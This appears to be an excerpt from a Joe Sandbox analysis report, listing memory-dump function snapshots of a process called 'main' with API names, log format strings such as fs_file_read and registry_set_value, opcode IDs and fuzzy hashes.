                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: ec76ef756d90aa2e6f6d4fda957d962ff4bca9cef00746e3cbda322dd1aa5041
                  • Instruction ID: f2bd7fa6e0b17e4952475642a14906d80756712fe52c2039e7f836464823bfa9
                  • Opcode Fuzzy Hash: ec76ef756d90aa2e6f6d4fda957d962ff4bca9cef00746e3cbda322dd1aa5041
                  • Instruction Fuzzy Hash: D8F08253B08E0385FB539A47B5817BD2A4A1F81379E4A45BACD5D0A6F5AF3DA8C78200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 9dcee868fc8d0d4ebf4b1399c9fd68259c6d0ade068cfdd08fcdd0dd21ee3033
                  • Instruction ID: 452f1c1ddbdfbf67019c50ad4783e6ce6340344e7586a79e01aeaa1a37fbf40f
                  • Opcode Fuzzy Hash: 9dcee868fc8d0d4ebf4b1399c9fd68259c6d0ade068cfdd08fcdd0dd21ee3033
                  • Instruction Fuzzy Hash: 50F08253B08E0385FB539A47B5817BD2A4A1F81379E4A45BACD5D0B6F5AE3DA8C78200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: f4213457ef053d910e4386c0c254c5d8167ae4f42edc73797463a6a03b798a44
                  • Instruction ID: fd6f6d172eb28c296f03119df2856448c40dd7530e2a0e32bb0bec3b6a21dc34
                  • Opcode Fuzzy Hash: f4213457ef053d910e4386c0c254c5d8167ae4f42edc73797463a6a03b798a44
                  • Instruction Fuzzy Hash: E6F08953B08E0345FB535A47B5417BD154A1F41379E4945B6CD5D0A6F5AE3DA8C78200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: ec76ef756d90aa2e6f6d4fda957d962ff4bca9cef00746e3cbda322dd1aa5041
                  • Instruction ID: f2bd7fa6e0b17e4952475642a14906d80756712fe52c2039e7f836464823bfa9
                  • Opcode Fuzzy Hash: ec76ef756d90aa2e6f6d4fda957d962ff4bca9cef00746e3cbda322dd1aa5041
                  • Instruction Fuzzy Hash: D8F08253B08E0385FB539A47B5817BD2A4A1F81379E4A45BACD5D0A6F5AF3DA8C78200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 9dcee868fc8d0d4ebf4b1399c9fd68259c6d0ade068cfdd08fcdd0dd21ee3033
                  • Instruction ID: 452f1c1ddbdfbf67019c50ad4783e6ce6340344e7586a79e01aeaa1a37fbf40f
                  • Opcode Fuzzy Hash: 9dcee868fc8d0d4ebf4b1399c9fd68259c6d0ade068cfdd08fcdd0dd21ee3033
                  • Instruction Fuzzy Hash: 50F08253B08E0385FB539A47B5817BD2A4A1F81379E4A45BACD5D0B6F5AE3DA8C78200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 6a353f7f9cde5acba82427e8c511acdef0ede31d79e680262527f052d903c98a
                  • Instruction ID: c1395b3a57143acf8b879b4ef1dde4464907afea316165d9d6b667450519c089
                  • Opcode Fuzzy Hash: 6a353f7f9cde5acba82427e8c511acdef0ede31d79e680262527f052d903c98a
                  • Instruction Fuzzy Hash: CBF0E253B08E0385FB539A47B4803BC2A4A1F80379E4A45BACC4D0A2F5AE3CA8C38200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 6a353f7f9cde5acba82427e8c511acdef0ede31d79e680262527f052d903c98a
                  • Instruction ID: c1395b3a57143acf8b879b4ef1dde4464907afea316165d9d6b667450519c089
                  • Opcode Fuzzy Hash: 6a353f7f9cde5acba82427e8c511acdef0ede31d79e680262527f052d903c98a
                  • Instruction Fuzzy Hash: CBF0E253B08E0385FB539A47B4803BC2A4A1F80379E4A45BACC4D0A2F5AE3CA8C38200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: fclose
                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                  • API String ID: 3125558077-1073242539
                  • Opcode ID: 28cdbc242a6302d443cb74f0fd5ade0e8a5883f5600bb2d8e31f58cf0c742293
                  • Instruction ID: 5b55ca0a7bcb1f02f981a854c9d603bb88d67012526e7411758e29a7a547d3eb
                  • Opcode Fuzzy Hash: 28cdbc242a6302d443cb74f0fd5ade0e8a5883f5600bb2d8e31f58cf0c742293
                  • Instruction Fuzzy Hash: 95F08953B08E0345FB535A47B5417BD154A1F41379E4945B6CD5D0A6F5AE3DA8C78200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-2187435201
                  • Opcode ID: 29f5a33fe2bfd9c73ec78c153296316038a8ef3e282bb18084eb0fbbc30a309e
                  • Instruction ID: b74e9c0f9979a41f8d181829fddb84254522fdafad5ada41276d2f39ee4c10cd
                  • Opcode Fuzzy Hash: 29f5a33fe2bfd9c73ec78c153296316038a8ef3e282bb18084eb0fbbc30a309e
                  • Instruction Fuzzy Hash: 5BF01266818F84C6E2119F18E4402ABB370FF9E789F705326EBCD66524DF3DD5428B10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-2713391170
                  • Opcode ID: efa7ca9327b7f50ec550392f9c9add8736aa4d523d0fd9fc290744eecbb183ed
                  • Instruction ID: ad6a9e63d2349dbd7a8638c5a519c93e507a524ad126413dae0324d0b1a4f919
                  • Opcode Fuzzy Hash: efa7ca9327b7f50ec550392f9c9add8736aa4d523d0fd9fc290744eecbb183ed
                  • Instruction Fuzzy Hash: E0F01D66808F84C6E2119F18E4402ABB370FF9E789F705326EBCD66664DF2DD5428B10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-4064033741
                  • Opcode ID: d67f6cb67d9aa1b683b19a67aea6ff021f067e3de8b3c453dfdd5ccf3ac71a10
                  • Instruction ID: 5b92e76b4967c493cc445d4a3dc403bd385b9d6da57af5eb6d86e5dcbbfcb53c
                  • Opcode Fuzzy Hash: d67f6cb67d9aa1b683b19a67aea6ff021f067e3de8b3c453dfdd5ccf3ac71a10
                  • Instruction Fuzzy Hash: E2F01D66808F84C6E2119F18E4402ABB370FF9E789FB05326EBCD66624DF2DD5428B10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-4283191376
                  • Opcode ID: 6742954880af872446bfc91b95b988c250abc5737df9b1f930ba577b45b3f3e3
                  • Instruction ID: e4420ec2ad72628c96468f6df066e3d1be05f5b4c509b02784fd9b02aa908bc4
                  • Opcode Fuzzy Hash: 6742954880af872446bfc91b95b988c250abc5737df9b1f930ba577b45b3f3e3
                  • Instruction Fuzzy Hash: 01F01D66818F84C6E2119F18E4402ABB370FF9F789F705326EBCD66628DF2DD5428B10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-4273532761
                  • Opcode ID: 854f2dfc0a9e7c149260f6d1f09afe283b3e576efdae8473c3133785e71ceb38
                  • Instruction ID: d4246b626652f75fc7235332d91cb530693cc8fd22896e0543e4ad3d21bcea80
                  • Opcode Fuzzy Hash: 854f2dfc0a9e7c149260f6d1f09afe283b3e576efdae8473c3133785e71ceb38
                  • Instruction Fuzzy Hash: 83F01D66818F84C6E2129F18E4402ABB370FF9E789F705326FBCD66664DF2DD5428B50
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-2468659920
                  • Opcode ID: 7b5741c81ed116a003f85b52f29fe4854fc43aa525cf99e73fbc959c4dfbf3ab
                  • Instruction ID: ab5df2fccebd59cc7069587675c096965e8d3344f8e6f5d03b8feecd055a0175
                  • Opcode Fuzzy Hash: 7b5741c81ed116a003f85b52f29fe4854fc43aa525cf99e73fbc959c4dfbf3ab
                  • Instruction Fuzzy Hash: 8CF0CD66818F8486E2119F18E4402ABB370FF9E789F605326EBC966624DF2DD5568B10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 1001908780-3542721600
                  • Opcode ID: 011ab9a70b99de4c8218d431ac0f198d09fec4b0464c0e8746d25ec54ad3ce3f
                  • Instruction ID: a1df4d939d1d1fc0b42486e92c5fc56291ed7da5020b90c6ee01a3985b701130
                  • Opcode Fuzzy Hash: 011ab9a70b99de4c8218d431ac0f198d09fec4b0464c0e8746d25ec54ad3ce3f
                  • Instruction Fuzzy Hash: A3E09252A1D306C5F6127B00FC00379A214EB907C0FE040BADA5EC2590DE3CD9C9D314
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 1001908780-3542721600
                  • Opcode ID: f3c564b8f652036ba9880a54bec866d382b02ba2223f7064c53f4347d1a62a30
                  • Instruction ID: a2dd5cffac34ffcadda1d0c90dbbf0cc020c466d59f7f25f793a9aa3f2b4e760
                  • Opcode Fuzzy Hash: f3c564b8f652036ba9880a54bec866d382b02ba2223f7064c53f4347d1a62a30
                  • Instruction Fuzzy Hash: 47E09252A1D30AC5F612BB00BC10279A214EB907C4FE041BADA5EC2690DE3CD9C9D315
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 1001908780-3542721600
                  • Opcode ID: 88fa3d5c166740637db26ab81a2390662024eb8359c00dedb32b98ad6b1dacd4
                  • Instruction ID: aaa88d815066609962765ffa2d01a6c98af59f58518757c324c6ba717dcfa1a9
                  • Opcode Fuzzy Hash: 88fa3d5c166740637db26ab81a2390662024eb8359c00dedb32b98ad6b1dacd4
                  • Instruction Fuzzy Hash: 9AE09252A1D306C5F612BB00BC00279A214EB907C4FE040BADA5EC2690DE3CD9C9D325
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 1001908780-3542721600
                  • Opcode ID: 7611e847a032fba620ef0b7a275849f1579b208a3f448534bbccfe8909af6c6c
                  • Instruction ID: aa0b8e5c5ba516f9fef2d3a09186f78eac9439b0b43d34fb33a82f256a4f4c7a
                  • Opcode Fuzzy Hash: 7611e847a032fba620ef0b7a275849f1579b208a3f448534bbccfe8909af6c6c
                  • Instruction Fuzzy Hash: 44E09252A1D306C5F612BF00FC00278A214EB907C4FE041BAEA5EC2590DE3CD9C9D315
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 1001908780-3542721600
                  • Opcode ID: d9efad4eec3e4561826b42dc29fea0b3c8f7b00078e471a97eecc6e0acabc104
                  • Instruction ID: 667a03f2f5f39cef0d1b9f97e91358e1ea1baadcf813a1d8afdfe089de6b1b34
                  • Opcode Fuzzy Hash: d9efad4eec3e4561826b42dc29fea0b3c8f7b00078e471a97eecc6e0acabc104
                  • Instruction Fuzzy Hash: D3E09252A1D306C5F612BB00BC10279A214EB907C4FE040BADA5EC2690DE3CD9C9D315
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                  • API String ID: 1001908780-3542721600
                  • Opcode ID: 003e0d9aeac96177aff85e6c6f2d363db7d32dd77a7cc7ba419fedfd1ff473d5
                  • Instruction ID: 4892740d0f18105319012f778dc14e6dd20ad9ba4bfb0362dc949dd316f7701f
                  • Opcode Fuzzy Hash: 003e0d9aeac96177aff85e6c6f2d363db7d32dd77a7cc7ba419fedfd1ff473d5
                  • Instruction Fuzzy Hash: B9E01252A0DA0781E712DF87FC5017D6219EB907B5F4441BAED0E426B4EE6CE589D341
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
